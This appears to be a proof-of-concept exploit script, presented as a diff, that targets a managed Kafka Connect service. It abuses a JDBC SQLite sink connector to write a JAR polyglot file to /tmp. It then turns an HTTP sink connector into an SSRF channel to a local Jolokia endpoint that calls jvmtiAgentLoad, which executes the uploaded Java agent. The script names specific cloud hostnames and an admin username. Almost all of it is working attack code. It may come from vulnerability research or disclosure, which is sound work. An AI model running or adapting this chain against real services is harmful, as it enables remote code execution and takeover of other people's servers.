| 1 | + | import imp |
| 2 | + | import requests |
| 3 | + | import json |
| 4 | + | import random |
| 5 | + | import string |
| 6 | + | import base64 |
| 7 | + | import kafka |
| 8 | + | import time |
| 9 | + | from kafka.admin import KafkaAdminClient, NewTopic |
| 10 | + | |
| 11 | + | # kafka_connect_api_baseurl = "http://localhost:8083" |
| 12 | + | kafka_connect_api_baseurl = "https://kafkaconnect-307d41f5-topyte-d458.aivencloud.com" |
| 13 | + | |
| 14 | + | kafka_user = "avnadmin" |
| 15 | + | kafka_password = "" |
| 16 | + | |
| 17 | + | # kafka_bootstrap_server = "localhost:9092" |
| 18 | + | kafka_bootstrap_server = "kafka-1ee9357b-topyte-d458.aivencloud.com:27393" |
| 19 | + | |
| 20 | + | hostname_payload = "" |
| 21 | + | |
| 22 | + | random_str = ''.join(random.choice(string.ascii_lowercase) for _ in range(2)) |
| 23 | + | |
| 24 | + | def create_topic(topic_name): |
| 25 | + | admin_client = KafkaAdminClient( |
| 26 | + | bootstrap_servers=kafka_bootstrap_server, |
| 27 | + | security_protocol="SSL", |
| 28 | + | ssl_cafile="aiven-kafka-certs/ca.pem", |
| 29 | + | ssl_certfile="aiven-kafka-certs/service.cert", |
| 30 | + | ssl_keyfile="aiven-kafka-certs/service.key" |
| 31 | + | ) |
| 32 | + | |
| 33 | + | topic_list = [] |
| 34 | + | topic_list.append(NewTopic(name=topic_name, num_partitions=1, replication_factor=1)) |
| 35 | + | admin_client.create_topics(new_topics=topic_list, validate_only=False) |
| 36 | + | |
| 37 | + | |
| 38 | + | def upload_polyglot(destination, localpath): |
| 39 | + | connector_name = f"jdbc_sqlite_poc_{random_str}" |
| 40 | + | topic_name = f"jdbc-sqlite-{random_str}" |
| 41 | + | |
| 42 | + | create_topic(topic_name) |
| 43 | + | |
| 44 | + | connector_url = f"{kafka_connect_api_baseurl}/connectors/{connector_name}" |
| 45 | + | |
| 46 | + | payload = json.dumps({ |
| 47 | + | # "connector.class":"io.confluent.connect.jdbc.JdbcSinkConnector", |
| 48 | + | "connector.class": "io.aiven.connect.jdbc.JdbcSinkConnector", |
| 49 | + | "connection.url": f"jdbc:sqlite:{destination}", |
| 50 | + | "connection.user": "something", |
| 51 | + | "connection.password": "something", |
| 52 | + | "name":connector_name, |
| 53 | + | "topics": topic_name, |
| 54 | + | "key.converter": "org.apache.kafka.connect.storage.StringConverter", |
| 55 | + | "value.converter": "org.apache.kafka.connect.json.JsonConverter", |
| 56 | + | "value.converter.schemas.enable": "true", |
| 57 | + | "auto.create": "true" # Create tables automatically |
| 58 | + | }) |
| 59 | + | headers = { |
| 60 | + | 'Content-Type': 'application/json' |
| 61 | + | } |
| 62 | + | |
| 63 | + | response = requests.request("PUT", f"{connector_url}/config", headers=headers, data=payload, auth=(kafka_user, kafka_password)) |
| 64 | + | print(response.text) |
| 65 | + | |
| 66 | + | payload_data = None |
| 67 | + | with open(localpath, 'rb') as f: |
| 68 | + | payload_data = f.read() |
| 69 | + | |
| 70 | + | # Create SQLite - JAR polyglot by submitting the JAR data to the kafka topic. |
| 71 | + | # The JDBC Sink Connector adds this data to the sqlite DB |
| 72 | + | producer = kafka.KafkaProducer( |
| 73 | + | bootstrap_servers=kafka_bootstrap_server, |
| 74 | + | security_protocol="SSL", |
| 75 | + | ssl_cafile="aiven-kafka-certs/ca.pem", |
| 76 | + | ssl_certfile="aiven-kafka-certs/service.cert", |
| 77 | + | ssl_keyfile="aiven-kafka-certs/service.key" |
| 78 | + | ) |
| 79 | + | producer.send(topic_name, json.dumps( |
| 80 | + | { |
| 81 | + | "schema": { |
| 82 | + | "type": "struct", |
| 83 | + | "fields": [{ |
| 84 | + | "field": "payload", |
| 85 | + | "type": "bytes", |
| 86 | + | "optional": False |
| 87 | + | }] |
| 88 | + | }, |
| 89 | + | "payload": { |
| 90 | + | "payload": base64.b64encode(payload_data).decode('utf-8') # JsonConverter uses com.fasterxml.jackson, which supports binary values as base64 encoded string |
| 91 | + | } |
| 92 | + | } |
| 93 | + | ).encode('utf-8')) |
| 94 | + | producer.flush() |
| 95 | + | |
| 96 | + | # Payload should now have been executed, delete the connector |
| 97 | + | #response = requests.request("DELETE", connector_url, headers=headers, auth=(kafka_user, kafka_password)) |
| 98 | + | #print(response.text) |
| 99 | + | |
| 100 | + | |
| 101 | + | |
| 102 | + | def send_http_post_ssrf(dst_url, body): |
| 103 | + | connector_name = f"http_poc_{random_str}" |
| 104 | + | topic_name = f"http-{random_str}" |
| 105 | + | |
| 106 | + | create_topic(topic_name) |
| 107 | + | |
| 108 | + | connector_url = f"{kafka_connect_api_baseurl}/connectors/{connector_name}" |
| 109 | + | |
| 110 | + | payload = json.dumps({ |
| 111 | + | "name": connector_name, |
| 112 | + | "connector.class": "io.aiven.kafka.connect.http.HttpSinkConnector", |
| 113 | + | "key.converter": "org.apache.kafka.connect.storage.StringConverter", |
| 114 | + | "value.converter": "org.apache.kafka.connect.storage.StringConverter", |
| 115 | + | "errors.log.enable": "true", |
| 116 | + | "errors.log.include.messages": "true", |
| 117 | + | "topics": topic_name, |
| 118 | + | "http.url": dst_url, |
| 119 | + | "http.headers.content.type": "application/json", |
| 120 | + | "http.authorization.type": "none" |
| 121 | + | }) |
| 122 | + | headers = { |
| 123 | + | 'Content-Type': 'application/json' |
| 124 | + | } |
| 125 | + | |
| 126 | + | response = requests.request("PUT", f"{connector_url}/config", headers=headers, data=payload, auth=(kafka_user, kafka_password)) |
| 127 | + | print(response.text) |
| 128 | + | |
| 129 | + | producer = kafka.KafkaProducer( |
| 130 | + | bootstrap_servers=kafka_bootstrap_server, |
| 131 | + | security_protocol="SSL", |
| 132 | + | ssl_cafile="aiven-kafka-certs/ca.pem", |
| 133 | + | ssl_certfile="aiven-kafka-certs/service.cert", |
| 134 | + | ssl_keyfile="aiven-kafka-certs/service.key" |
| 135 | + | ) |
| 136 | + | producer.send(topic_name, body) |
| 137 | + | producer.flush() |
| 138 | + | |
| 139 | + | # Payload should now have been executed, delete the connector |
| 140 | + | #response = requests.request("DELETE", connector_url, headers=headers, auth=(kafka_user, kafka_password)) |
| 141 | + | #print(response.text) |
| 142 | + | |
| 143 | + | agent_jar_name_path = f'/tmp/agent_{random_str}.jar' |
| 144 | + | |
| 145 | + | upload_polyglot(agent_jar_name_path, 'java-agent-1.0-SNAPSHOT.jar') |
| 146 | + | |
| 147 | + | # Wait for jdbc sink to create the sqlite database |
| 148 | + | print("Waiting...") |
| 149 | + | time.sleep(5) |
| 150 | + | |
| 151 | + | send_http_post_ssrf("http://localhost:6725/jolokia/", json.dumps({ |
| 152 | + | "type" : "exec", |
| 153 | + | "mbean" : "com.sun.management:type=DiagnosticCommand", |
| 154 | + | "operation" : "jvmtiAgentLoad", |
| 155 | + | "arguments": [agent_jar_name_path] |
| 156 | + | }).encode('utf-8')) |
| 157 | + | |
| 158 | + | |